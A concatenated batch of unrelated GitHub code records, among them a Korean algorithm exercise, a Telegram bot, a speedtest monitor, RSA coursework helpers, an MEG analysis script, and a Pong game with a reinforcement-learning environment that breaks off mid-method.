set_of_values.get('AcctProdIDFull__c') is not None","repo_name":"databar-team/nbc","sub_path":"map-marketingcloud-worker/app/worker/data/fi_mc.py","file_name":"fi_mc.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17767590273","text":"def dfs(level, beginWith):\n if level == r: # r개를 뽑은 경우\n # print(result)\n return True\n global score_sum\n global cal_sum\n for i in range(beginWith, len(inputs)):\n score_sum += inputs[i][0]\n cal_sum += inputs[i][1]\n if cal_sum > l:\n return False\n # result[level] = inputs[i]\n dfs(level+1, i+1)\n\n# def check(idx, score, cal):\n# global score_max\n#\n# if cal > l:\n# return\n#\n# if score > score_max:\n# score_max = score\n#\n# if idx == n:\n# return\n#\n# check(idx+1, score, cal)\n# check(idx+1, score + inputs[idx][0], cal + inputs[idx][1])\n\nt = int(input())\n\nfor i in range(1, t+1):\n print(\"#\" + str(i), end=' ') # TC 갯수\n\n n, l = map(int, input().split()) # 재료의 수, 제한 칼로리\n inputs = list()\n for _ in range(n):\n t, k = map(int, input().split())\n inputs.append((t, k))\n\n score_max = 0\n for r in range(1, n+1):\n score_sum = 0\n cal_sum = 0\n if dfs(0,0):\n score_max = max(score_max, score_sum)\n print(score_max)\n\n\n\n # for j in range(1, n+1):\n # for combs in combinations(inputs, j):\n # t_sum = 0\n # k_sum = 0\n # for comb in combs:\n # t_sum += comb[0]\n # k_sum += comb[1]\n # if k_sum > l:\n # continue\n # else:\n # t_sum_max = max(t_sum_max, t_sum)\n#\n# print(t_sum_max)\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n# t = int(input())\n#\n# # def combinations(array, r):\n# # for i in range(len(array)):\n# # if r == 1:\n# # yield [array[i]]\n# # else:\n# # for next in combinations(array[i+1:], r-1):\n# # yield [array[i]] + next\n# #\n# # def combinations2(lst, k):\n# # if k == 0:\n# # return [[]]\n# # arr = []\n# # for x in range(0, len(lst)):\n# # m = lst[x]\n# # _lst = lst[x+1:]\n# # for p in combinations2(_lst, k-1):\n# # arr.append([m]+p)\n# # return arr\n#\n# # combinations(k+1, score + scoreLst(k), cal+calLst(k) : 포함\n# # combinations(k+1, score, cal) : 비포함\n#\n# def combination(idx, score, cal):\n# global score_max\n#\n# for i in range(1, t+1):\n# print(\"#\" + str(i), end=' ')\n#\n# n, l = map(int, input().split())\n# ts = list()\n# ks = list()\n#\n# for _ in range(n):\n# t, k = map(int, input().split())\n# ts.append(t)\n# ks.append(k)\n#\n# # ts_sums = list()\n# score_max = 0\n# for j in range(1, n+1):\n# combs = list(combinations(ks, j))\n# for k in range(len(combs)):\n# combinations(ts, j))[k]\n# ts_sums.append(sum(list(combinations(ts, j))[k]))\n# print(score_max)","repo_name":"heeheejj/Algorithm","sub_path":"swea/5215_2.py","file_name":"5215_2.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17445301371","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"bovw\",\n version=\"0.0.1\",\n author=\"Tamas Suveges\",\n author_email=\"stamas01@gmail.com\",\n description=\"A bag-of-visual-words implementaion using sklearn.cluster.KMemans\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/stamas02/BOVW/blob/master/bovw/bovw.py\",\n packages=[\"bovw\"],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires=\">=3.6\",\n install_requires=[\"opencv-contrib-python\", \"tqdm\", \"scipy\", \"sklearn\"],\n)\n","repo_name":"stamas02/BOVW","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16061605642","text":"#!/usr/bin/env python\n\nimport config\nimport telebot\n\nfrom telebot import types\n\n\n\n\nbot = telebot.TeleBot(config.token)\n@bot.message_handler(commands=['help','start'])\ndef send_welcome(message):\n bot.reply_to(message, \"Hello, you can use following commands \\n /start \\n /help \\n /links\")\n \n \n@bot.message_handler(commands=['links'])\ndef command_help(message):\n markup = types.InlineKeyboardMarkup()\n itembtna = types.InlineKeyboardButton('open our site', url='www.credit-agricole.ua')\n itembtnv = types.InlineKeyboardButton('show contacts', url= 'www.umc.ua')\n itembtnc = types.InlineKeyboardButton('c', switch_inline_query=\"\")\n markup.row(itembtna)\n markup.row(itembtnv, itembtnc)\n bot.send_message(message.chat.id, \"Choose one letter:\", reply_markup=markup)\n\n \n\n@bot.message_handler(commands=[\"geophone\"])\ndef geophone(message):\n # Эти параметры для клавиатуры необязательны, просто для удобства\n keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n button_phone = types.KeyboardButton(text=\"Отправить номер телефона\", request_contact=True)\n button_geo = types.KeyboardButton(text=\"Отправить местоположение\", request_location=True)\n keyboard.add(button_phone, button_geo)\n bot.send_message(message.chat.id, \"---\", reply_markup=keyboard)\n\n\n\nbot.send_location\n \nbot.polling()\n","repo_name":"yvlitvin/test_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21038945005","text":"from ryu.controller.event import EventBase\n\n\nclass EventStartEAPOL(EventBase):\n \"\"\"EAPoL start received\n \"\"\"\n def __init__(self, dpid, src, dst, port):\n super(EventStartEAPOL, self).__init__()\n self.dpid = dpid\n self.src = src\n self.dst = dst\n self.port = port\n\n\nclass EventLogoffEAPOL(EventBase):\n \"\"\"EAPoL logoff received\n \"\"\"\n def __init__(self, dpid, port):\n super(EventLogoffEAPOL, self).__init__()\n self.dpid = dpid\n self.port = port\n\n\nclass EventStartEAPMD5Challenge(EventBase):\n \"\"\"EAP identify response received\n \"\"\"\n def __init__(self, dpid, port, identity):\n super(EventStartEAPMD5Challenge, self).__init__()\n self.dpid = dpid\n self.port = port\n self.identity = identity\n\n\nclass EventFinishEAPMD5Challenge(EventBase):\n \"\"\"EAP MD5 challenge response received\n \"\"\"\n def __init__(self, dpid, port, challenge, identifier):\n super(EventFinishEAPMD5Challenge, self).__init__()\n self.dpid = dpid\n self.port = port\n self.challenge = challenge\n self.identifier = identifier\n\n\nclass EventOutputEAPOL(EventBase):\n \"\"\"Request to send an EAPoL frame\n \"\"\"\n def __init__(self, dpid, port, pkt):\n super(EventOutputEAPOL, self).__init__()\n self.dpid = dpid\n self.port = port\n self.pkt = pkt\n","repo_name":"shimojo-lab/flowsieve","sub_path":"flowsieve/eap_events.py","file_name":"eap_events.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"71193189173","text":"import config\n\ndef getCellByCoords(x, y):\n row = int(x) // config.CELL_HEIGHT\n col = int(y) // config.CELL_WIDTH\n\n return (row, col)\n\ndef getLineEq(x1,y1,x2,y2):\n A = y1 - y2\n B = x2 - x1\n C = -(A * x1 + B * y1)\n\n return A, B, C\n","repo_name":"EgorovM/firstOOPproject","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33988292968","text":"clientes_academia = []\ndef verificar_clientes():\n while True:\n codigo = int(input('Digite seu código: '))\n if codigo == 0:\n break\n else:\n nome = input('Digite seu nome: ').title()\n altura = float(input('Digite sua altura: '))\n peso = float(input('Digite seu peso: '))\n\n clientes = {\n 'codigo': codigo,\n 'nome': nome,\n 'altura': altura,\n 'peso': peso\n }\n clientes_academia.append(clientes) \n return clientes_academia\n\ndef total_alturas():\n total_alturas = 0\n for cliente in clientes_academia:\n altura = cliente['altura']\n total_alturas += altura\n return total_alturas\n\ndef total_pesos():\n total_pesos = 0\n for cliente in clientes_academia:\n peso = cliente['peso']\n total_pesos += peso\n return total_pesos\n\ndef maior_cliente():\n maior_cliente = {}\n for cliente in clientes_academia:\n altura = cliente['altura']\n if 'altura' in maior_cliente:\n if altura > maior_cliente['altura']:\n maior_cliente = cliente\n else:\n maior_cliente = cliente\n return maior_cliente['nome']\n\ndef menor_cliente():\n menor_cliente = {}\n for cliente in clientes_academia:\n altura = cliente['altura']\n if 'altura' in menor_cliente:\n if altura < menor_cliente['altura']:\n menor_cliente = cliente\n else:\n menor_cliente = cliente\n return menor_cliente['nome']\n\ndef cliente_mais_gordo():\n cliente_gordo = {}\n for cliente in clientes_academia:\n peso = cliente['peso']\n if 'peso' in cliente_gordo:\n if peso > cliente_gordo['peso']:\n cliente_gordo = cliente\n else:\n cliente_gordo = cliente\n return cliente_gordo['nome']\n\ndef cliente_mais_magro():\n cliente_magro = {}\n for cliente in clientes_academia:\n peso = cliente['peso']\n if 'peso' in cliente_magro:\n if peso < cliente_magro['peso']:\n cliente_magro = cliente\n else:\n cliente_magro = cliente\n return cliente_magro['nome']\n\ndef qtd_clientes():\n qtd = len(clientes_academia)\n return qtd\n\ndef media_altura():\n altura = total_alturas()\n clientes = qtd_clientes()\n media = altura / clientes\n return media\n\ndef media_peso():\n media = total_pesos / qtd_clientes()\n return media\n\nif __name__ == '__main__':\n print(verificar_clientes())\n print(f'Total de clientes: {qtd_clientes()}')\n print(f'Total altura: {total_alturas()}m')\n print(f'Total peso: {total_pesos()}Kg')\n print(f'Maior cliente: {maior_cliente()}')\n print(f'Menor cliente: {menor_cliente()}')\n print(f'Cliente mais gordo: {cliente_mais_gordo()}')\n print(f'Cliente mais magro: {cliente_mais_magro()}')\n print(f'Media de altura: {media_altura()}m')\n print(f'Media de peso: {media_peso()}Kg')","repo_name":"carlosrjhoe/Python","sub_path":"Livro_Guia_prático_de_programação_python/Exercicios/exercicio_33.py","file_name":"exercicio_33.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37452558353","text":"import json\nimport threading\nimport time\nfrom datetime import datetime\n\nimport requests\nimport speedtest\nfrom bson.json_util import dumps\n\nfrom . import settings\nfrom . import database\nfrom .logger import logger\n\n\nclass SpeedtestMgr:\n def __init__(self):\n self.st = speedtest.Speedtest()\n self.do_run = True\n self.pause = False\n self.last_result = None\n\n self._sleep = settings.get('scan-interval') * 60\n self._thread = None\n self.__status = \"none\"\n self.__client_info = None\n self.__all_servers = None\n\n def task(self, socketio):\n while self.do_run:\n if self.pause:\n time.sleep(1)\n continue\n\n batch_results = []\n start = datetime.utcnow()\n for server_id in settings.get('servers'):\n sv = self.st.get_servers([server_id])\n sv = sv[list(sv.keys())[0]][0]\n\n logger.debug('Starting speedtest with server: %s (%s - %s) %s',\n sv['sponsor'], sv['name'], sv['country'], sv['host'])\n self.update_status(socketio, \"started\", {'timestamp': str(start)})\n\n # Cancel point\n if not self.do_run:\n break\n\n logger.debug('Testing download speed...')\n self.update_status(socketio, \"downloading\")\n download = self.st.download()\n logger.debug('Download test finished with %s bits', download)\n\n # Cancel point\n if not self.do_run:\n break\n\n logger.debug('Testing upload speed...')\n self.update_status(socketio, \"uploading\")\n upload = self.st.upload()\n logger.debug('Upload test finished with %s bits', upload)\n\n # Cancel point\n if not self.do_run:\n break\n\n results = self.st.results.dict()\n results['server'] = sv\n results['batch_timestamp'] = start.isoformat()\n batch_results.append(results)\n self.last_result = results\n database.insert_result(results)\n\n logger.debug('Speedtest finished: %s', results)\n self.update_status(socketio, \"finished\", json.loads(dumps(results)))\n\n # Cancel point\n if not self.do_run:\n break\n\n # Run at the next scheduled time\n diff = max(self._sleep - (datetime.utcnow() - start).total_seconds(), 15)\n self.update_status(socketio, \"batch_finished\", {\n 'sleep_time': diff, 'results': json.loads(dumps(batch_results))\n })\n\n logger.debug('Waiting for {:.3f} seconds for the next measurement.'.format(diff))\n time.sleep(diff)\n\n def start(self, socketio):\n if self._thread is not None:\n logger.warn('SpeedtestMgr$start already invoked.')\n return\n\n logger.debug('Starting speedtest thread...')\n self._thread = threading.Thread(target=self.task, args=(socketio,))\n self._thread.start()\n logger.debug('Speedtest thread started.')\n\n @property\n def status(self):\n return self.__status\n\n @property\n def client_info(self):\n if self.__client_info is None:\n self.__client_info = requests.get('http://extreme-ip-lookup.com/json/').json()\n\n return self.__client_info\n\n @property\n def servers(self):\n if self.__all_servers is None:\n self.st.get_servers()\n self.__all_servers = [v[0] for k, v in self.st.servers.items()]\n self.__all_servers.sort(key=lambda x: x['d'])\n\n return self.__all_servers\n\n def set_test_servers(self, server_list):\n if not isinstance(server_list, list) and not isinstance(server_list, int):\n raise RuntimeError('server_list must be a list of servers ids or an int')\n\n if isinstance(server_list, int):\n server_list = [server_list]\n\n for server_id in server_list:\n found = False\n for k, server in self.__all_servers:\n if server_id == server['id']:\n found = True\n break\n if not found:\n raise RuntimeError('Server id {} not found'.format(server_id))\n\n self.st.get_servers(server_list)\n\n def update_status(self, socketio, status, data=None):\n self.__status = status\n\n payload = {'status': status, 'data': data}\n socketio.emit('speedtest_update', payload)\n","repo_name":"jkcgs/speedtest-probe","sub_path":"stprobe/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21560084173","text":"\"\"\"\n @author: franck\n @datetime: 2020-08-01 14:00\n\"\"\"\n\nimport redis \n# cant import leveldb \n\nclass UrlDB:\n '''Use LevelDB to store URLs what have been done(succeed or faile)\n '''\n status_failure = b'0'\n status_success = b'1'\n\n def __init__(self):\n self.db = redis.Redis(host='localhost', port=6379, db=0)\n\n def set_success(self, url):\n if isinstance(url, str):\n url = url.encode('utf8')\n try:\n self.db.set(url, self.status_success)\n s = True\n except:\n s = False\n return s\n\n def set_failure(self, url):\n if isinstance(url, str):\n url = url.encode('utf8')\n try:\n print(url)\n self.db.set(url, self.status_failure)\n s = True\n except:\n s = False\n return s\n\n def has(self, url):\n if isinstance(url, str):\n url = url.encode('utf8')\n try:\n attr = self.db.get(url)\n return attr\n except:\n pass\n return False\n\nif __name__ == \"__main__\":\n mytest = UrlDB()\n a = mytest.set_success('http://baidu.com')\n b = mytest.set_failure('http://weibo.com')\n c = mytest.has('http://baidu.com')\n print(a)\n print(b)\n print(c)","repo_name":"franckisses/python_spider","sub_path":"code/leverdb_test.py","file_name":"leverdb_test.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38888951104","text":"def mod_pow(__base: int, __exponent: int, __modulus: int) -> int:\r\n # based on the implementation shown in the textbook\r\n result = 1\r\n while __exponent > 0:\r\n if __exponent % 2 == 1:\r\n result = (result * __base) % __modulus\r\n __exponent //= 2\r\n __base = (__base * __base) % __modulus\r\n return result\r\n\r\n\r\ndef decryptRSA(__ciphertext: list[int], __secret_key: int, __modulus: int) -> str:\r\n plaintext = [mod_pow(code, __secret_key, __modulus) for code in __ciphertext]\r\n # print message\r\n message = ''\r\n for code in plaintext:\r\n message += chr(code)\r\n return message\r\n\r\n\r\ndef trial_division(__num: int):\r\n # based on the implementation shown in the textbook\r\n L = []\r\n while __num % 2 == 0:\r\n L.append(2)\r\n __num //= 2\r\n factor = 3\r\n while factor * factor <= __num:\r\n if __num % factor == 0:\r\n L.append(factor)\r\n __num //= factor\r\n else:\r\n factor += 2\r\n if __num != 1:\r\n L.append(__num)\r\n return L\r\n","repo_name":"asimakiskydros/University-Projects","sub_path":"Cryptography/project #2/code/myfuncs.py","file_name":"myfuncs.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16524312625","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 30 13:00:25 2020\n\n@author: ja151\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 31 15:51:58 2020\n\n@author: ja151\n\"\"\"\n\nimport mne\nimport pickle\nimport numpy as np\nimport os\n\npaths = {'in': '/autofs/cluster/transcend/MEG/speech/',\n 'local': '/local_mount/space/hypatia/1/users/jussi/speech/',\n 'erm': '/autofs/cluster/transcend/MEG/erm/',\n 'fs': '/autofs/cluster/transcend/MRI/WMA/recons/',\n 'cluster': '/autofs/cluster/transcend/jussi/'\n }\n\nf = open('%s/p/subjects.p' % paths['cluster'], 'rb')\nsub_info = pickle.load(f)\nf.close()\n\n# define bad subjects\n# bad_subs = ['105801', '107301']\nbad_subs = ['105801', '107301', '052902', '090902', '048102', '075401', '096603']\nfor bad_sub in bad_subs:\n ind = sub_info['sub_ID'].index(bad_sub)\n n_subs = len(sub_info['sub_ID'])\n [sub_info[key].pop(ind) for key in sub_info.keys() \n if len(sub_info[key])==n_subs]\nsub_IDs = sub_info['sub_ID']\n# sub_IDs = ['083701', '089201', '093101']\n\n\n# conditions\nconds = ['all']\nn_conds = len(conds)\nequalize_event_counts = False\ncombine_conds = False\n\n# rois\nroi_names = ['AC_dSPM_5verts_MSS_SWS_peak0-500ms_auto-lh',\n 'seed_AC_wpli2_debiased_8-12Hz_28TD_vs_28ASD_MSS-SWS_cdt0.01_pht1e-08-lh'\n ]\nroi_labels = ['AC', 'con_phte-8']\naverage_verts = True # False, True, or ROI-specific vector\n\nsave_prefix = 'ACseedConClusters'\n\n# params for source estimates\nsnr = 1.0\nlambda2 = 1.0 / snr ** 2\nstc_method = 'MNE'\npick_ori = 'normal'\ntc_extract = 'mean_flip'\n\n# Read the source space \nsrc_fname = '%s/fsaverageJA/bem/fsaverageJA-oct6-src.fif' % paths['fs']\nsrc_fsave = mne.read_source_spaces(src_fname)\nverts_fsave = [s['vertno'] for s in src_fsave]\n\n#%% \n\nfor sub_ID in sub_IDs:\n local_path = '%s/%s/' % (paths['local'], sub_ID)\n cluster_path = '%s/%s/' % (paths['cluster'], sub_ID)\n inv = mne.minimum_norm.read_inverse_operator('%s/%s_0-200Hz-oct6-inv.fif' \n % (local_path, sub_ID))\n src = inv['src'] \n verts = [s['vertno'] for s in src]\n n_verts = len(np.concatenate(verts))\n fs_id = sub_info['FS_dir'][sub_info['sub_ID'].index(sub_ID)]\n \n epochs = mne.read_epochs('%s/%s_speech_0-200Hz_notch60Hz_-500-2000ms-epo.fif' \n % (local_path, sub_ID), proj=False)\n sfreq = epochs.info['sfreq']\n \n if equalize_event_counts:\n # check which conditions only have one stimulus\n conds1 = [cond for cond in conds if len(epochs[cond].event_id)==1]\n if conds1:\n epochs1 = [epochs[cond] for cond in conds1]\n # and which two\n conds2 = list(set(conds) - set(conds1))\n # equalize those with one first\n print('Equalizing epoch counts for %s' % conds1)\n epochs.equalize_event_counts(conds1)\n if conds2:\n print('Dropping epochs from %s to match %s' % (conds2, conds1))\n # and then equalize those with two with the number of those with one\n n_epochs = len(epochs[conds1[0]])\n epochs2 = [epochs[cond][0:n_epochs] for cond in conds2]\n # combine back to one dict\n epochs = {cond: epochs for cond,epochs \n in zip(conds1 + conds2, epochs1 + epochs2)}\n else:\n epochs.equalize_event_counts(conds)\n \n if combine_conds:\n this_conds = [conds]\n else:\n this_conds = conds\n \n rois = []\n for i,roi_name in enumerate(roi_names):\n roi_path = '%s/%s/rois/%s.label' % (paths['cluster'], sub_ID, \n roi_name)\n roi_path_fsave = '%s/rois/%s.label' % (paths['cluster'], roi_name)\n if os.path.exists(roi_path):\n rois.append(mne.read_label(roi_path, subject=fs_id))\n elif os.path.exists(roi_path_fsave):\n if type(average_verts)==list:\n this_average_verts = average_verts[i]\n else:\n this_average_verts = average_verts\n if average_verts:\n roi = mne.read_label(roi_path_fsave, subject='fsaverageJA')\n rois.append(roi.copy().morph(subject_to=fs_id, \n subject_from='fsaverageJA',\n grade=verts,\n subjects_dir=paths['fs']))\n else:\n rois.append(mne.read_label(roi_path_fsave, subject='fsaverageJA'))\n\n \n else:\n rois.append(mne.read_labels_from_annot('fsaverageJA', \n parc='PALS_B12_Lobes', \n subjects_dir=paths['fs'], \n regexp=roi_name)[0])\n \n \n for cond in this_conds:\n print('\\nCondition: %s' % cond)\n if average_verts or all(average_verts):\n if cond=='all':\n this_epochs = epochs\n else:\n this_epochs = epochs[cond]\n stcs = mne.minimum_norm.apply_inverse_epochs(this_epochs, \n inverse_operator=inv, \n lambda2=lambda2, \n method=stc_method, \n pick_ori=pick_ori) \n tcs = mne.extract_label_time_course(stcs, rois, src, tc_extract)\n info = mne.create_info(roi_labels, sfreq)\n else:\n tcs = []\n labels = []\n for i,roi in enumerate(rois):\n if cond=='all':\n this_epochs = epochs\n else:\n this_epochs = epochs[cond]\n stcs = mne.minimum_norm.apply_inverse_epochs(this_epochs, \n inverse_operator=inv, \n lambda2=lambda2, \n method=stc_method, \n pick_ori=pick_ori)\n if average_verts[i]:\n tcs.append(mne.extract_label_time_course(stcs, roi, src, tc_extract))\n labels.append([roi.name[0:2]])\n else:\n # morph individual source estimate to freesurfer average brain\n morph = mne.compute_source_morph(src, fs_id, 'fsaverageJA',\n src_to=src_fsave, \n subjects_dir=paths['fs']) \n stcs = [morph.apply(stc) for stc in stcs]\n tcs.append([stc.in_label(roi).data for stc in stcs])\n labels.append([str(i) for i in range(tcs[i][0].shape[0])]) \n \n tcs = np.concatenate(tcs, axis=1)\n info = mne.create_info(list(np.concatenate(labels)), sfreq)\n \n \n # put time courses in mne data array \n data = mne.EpochsArray(tcs, info, tmin=-0.5, baseline=(-0.5, 0))\n if combine_conds:\n cond = ('_').join(cond)\n data.save('%s/%s_%s_%d-%dms_%d-%dHz-epo.fif' % (cluster_path, save_prefix, cond,\n int(this_epochs.tmin * 1000),\n int(this_epochs.tmax * 1000),\n int(this_epochs.info['highpass']),\n int(this_epochs.info['lowpass'])), overwrite=True)\n","repo_name":"alhoj/ASD","sub_path":"export_ROI_timecourses.py","file_name":"export_ROI_timecourses.py","file_ext":"py","file_size_in_byte":7903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72556844852","text":"import pygame\nimport random\nimport math\nfrom pygame.locals import (\n K_UP,\n K_DOWN,\n K_LEFT,\n K_RIGHT,\n K_r,\n K_ESCAPE,\n KEYDOWN,\n QUIT,\n)\nimport numpy as np\nfrom enum import IntEnum\nimport gym\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Flatten\nfrom tensorflow.keras.optimizers import Adam\nfrom rl.agents import DQNAgent\nfrom rl.policy import BoltzmannQPolicy\nfrom rl.memory import SequentialMemory\nfrom gym import error, spaces\nimport copy\nimport argparse\nimport sys\n\nWIDTH = 512\nHEIGHT = 512\nPLAT_WIDTH = 16\nPLAT_HEIGHT = 80\nPLAT_BORDER_OFFSET = 8\nENEMY_PLAT_COLOR = (255, 255, 255)\nPLAYER_PLAT_COLOR = (255, 255, 255)\nPLAT_SPEED = 3.3\nBALL_SPEED = 6\nBALL_COLOR = (255, 0, 0)\nBALL_RADIUS = 8\nBOUNDS = {\n 'left': 0,\n 'right': WIDTH,\n 'top': 0,\n 'bottom': HEIGHT,\n}\nMODEL_FILE = 'dqn_weights.h5f'\nBALL_BOUNCE_Y_ANGLE = BALL_SPEED\nPADDING = 5\n\nclass Difficulty(IntEnum):\n Easy = 0\n Hard = 1\n\nstate = {\n 'enemy_pos': None,\n 'player_pos': None,\n 'player_vel': None,\n 'ball_pos': None,\n 'ball_vel': None,\n 'enemy_score': 0,\n 'player_score': 0,\n 'difficulty': Difficulty.Hard,\n}\n\ndef respawn_ball():\n state['ball_pos'] = [int(WIDTH / 2), int(HEIGHT / 2)]\n K = 0.05\n state['ball_vel'] = pygame.math.Vector2([\n random.choice([-1, 1]) * random.uniform(0.5, 1.0) * 2 * BALL_SPEED,\n random.uniform(0.0, 0.25) * 2 * BALL_BOUNCE_Y_ANGLE,\n ])\n\ndef reset():\n state['enemy_pos'] = [\n PLAT_BORDER_OFFSET,\n int(HEIGHT / 2)\n ]\n state['player_pos'] = [\n WIDTH - PLAT_BORDER_OFFSET - PLAT_WIDTH,\n int(HEIGHT / 2)\n ]\n state['player_vel'] = PLAT_SPEED\n respawn_ball()\n state['player_score'] = 0\n state['enemy_score'] = 0\n\ndef player_move_up():\n new_y = state['player_pos'][1] - PLAT_SPEED\n if new_y <= 0:\n state['player_pos'][1] = 0\n else:\n state['player_pos'][1] = new_y\n\ndef player_move_down():\n new_y = state['player_pos'][1] + PLAT_HEIGHT + PLAT_SPEED\n if new_y >= HEIGHT:\n state['player_pos'][1] = HEIGHT - PLAT_HEIGHT\n else:\n state['player_pos'][1] += PLAT_SPEED\n\ndef collides_with_platform(ball_pos, platform, mod):\n p_startx = platform[0]\n p_endx = p_startx + PLAT_WIDTH\n p_starty = platform[1]\n p_endy = p_starty + PLAT_HEIGHT\n bp = [ball_pos[0] + mod * BALL_RADIUS, ball_pos[1] + BALL_RADIUS]\n if mod == 1:\n collides_x = bp[0] >= p_startx\n else:\n collides_x = bp[0] <= (p_startx + PLAT_WIDTH)\n collides_y = bp[1] >= p_starty and bp[1] <= p_endy\n collides = collides_x and collides_y\n return collides\n\ndef update():\n # Update enemy pos\n if state['difficulty'] == Difficulty.Easy:\n state['enemy_pos'][1] += (state['ball_pos'][1] - state['enemy_pos'][1]) / random.uniform(2, 5)\n else:\n d = (state['ball_pos'][1] - state['enemy_pos'][1])\n k = 1 if d > 0 else -1 if d < 0 else 0\n state['enemy_pos'][1] += k * PLAT_SPEED\n if state['enemy_pos'][1] <= 0:\n state['enemy_pos'][1] = 0\n elif state['enemy_pos'][1] + PLAT_HEIGHT >= HEIGHT:\n state['enemy_pos'][1] = HEIGHT - PLAT_HEIGHT\n\n bpmrx = state['ball_pos'][0] - BALL_RADIUS\n bpprx = state['ball_pos'][0] + BALL_RADIUS\n bpmry = state['ball_pos'][1] - BALL_RADIUS\n bppry = state['ball_pos'][1] + BALL_RADIUS\n\n if bpmrx < BOUNDS['left']:\n # enemy loss\n state['player_score'] += 1\n respawn_ball()\n\n if (bpprx > BOUNDS['right']):\n # player loss\n state['enemy_score'] += 1\n respawn_ball()\n\n if (bpmry < BOUNDS['top']) or (bppry > BOUNDS['bottom']):\n state['ball_vel'].y *= -1\n\n if collides_with_platform(state['ball_pos'], state['player_pos'], 1):\n state['ball_vel'].x *= -1 * BALL_SPEED\n state['ball_vel'].y = random.uniform(-BALL_BOUNCE_Y_ANGLE, BALL_BOUNCE_Y_ANGLE)\n elif collides_with_platform(state['ball_pos'], state['enemy_pos'], -1):\n state['ball_vel'].x *= -1 * BALL_SPEED\n state['ball_vel'].y = random.uniform(-BALL_BOUNCE_Y_ANGLE, BALL_BOUNCE_Y_ANGLE)\n\n # print('ball velocity: '.format(state['ball_vel']))\n state['ball_pos'][0] += state['ball_vel'].x\n state['ball_pos'][1] += state['ball_vel'].y\n\npygame.init()\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\nenemy_surf = pygame.Surface((PLAT_WIDTH, PLAT_HEIGHT))\nenemy_surf.fill(ENEMY_PLAT_COLOR)\nplayer_surf = pygame.Surface((PLAT_WIDTH, PLAT_HEIGHT))\nplayer_surf.fill(PLAYER_PLAT_COLOR)\nfont = pygame.font.Font(pygame.font.get_default_font(), 18)\ndef render(state):\n # Reset screen\n screen.fill((0, 0, 0))\n # Opponent platform\n screen.blit(enemy_surf, (state['enemy_pos'][0], state['enemy_pos'][1]))\n # Player platform\n screen.blit(player_surf, (state['player_pos'][0], state['player_pos'][1]))\n # Ball\n pygame.draw.circle(\n screen,\n BALL_COLOR,\n (state['ball_pos'][0], state['ball_pos'][1]),\n BALL_RADIUS\n )\n # Render text\n en_text_surface = font.render('Enemy: {}'.format(state['enemy_score']), True, (255, 255, 255))\n en_text_rect = en_text_surface.get_rect()\n en_text_rect.topleft = (PADDING, PADDING)\n screen.blit(en_text_surface, en_text_rect)\n player_text_surface = font.render('Player: {}'.format(state['player_score']), True, (255, 255, 255))\n player_text_rect = player_text_surface.get_rect()\n player_text_rect.topright = (WIDTH - PADDING, PADDING)\n screen.blit(player_text_surface, player_text_rect)\n pygame.display.flip()\n\ndef run_game():\n running = True\n reset()\n clock = pygame.time.Clock()\n while running:\n # Process events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n elif event.key == K_r:\n reset()\n keys = pygame.key.get_pressed()\n if keys[K_UP]:\n player_move_up()\n elif keys[K_DOWN]:\n player_move_down()\n update()\n render(state)\n clock.tick(60)\n pygame.quit()\n\nclass Action(IntEnum):\n Up = 0\n Down = 1\n DoNothing = 2\n\nclass PongEnv(gym.Env):\n K = 5\n ACTION_TO_FUN_MAPPING = {\n Action.Up: player_move_up,\n Action.Down: player_move_down,\n Action.DoNothing: lambda: None,\n }\n\n def __init__(self):\n self.action_space = spaces.Discrete(len(list(PongEnv.ACTION_TO_FUN_MAPPING.keys())))\n # self.state = np.array(list(state.values()))\n\n @staticmethod\n def state_diff(new_state, old_state):\n return new_state['player_score'] - old_state['player_score']\n\n def get_state(self):\n global state\n return state\n\n @staticmethod\n def state_to_input_repr(state):\n s = np.array([\n state['enemy_pos'][0],\n state['enemy_pos'][1],\n state['player_pos'][0],\n state['player_pos'][1],\n state['ball_pos'][0],\n state['ball_pos'][1],\n state['ball_vel'][0],\n state['ball_vel'][1],\n ])\n return s\n\n def perform_action(self, action):\n global state\n 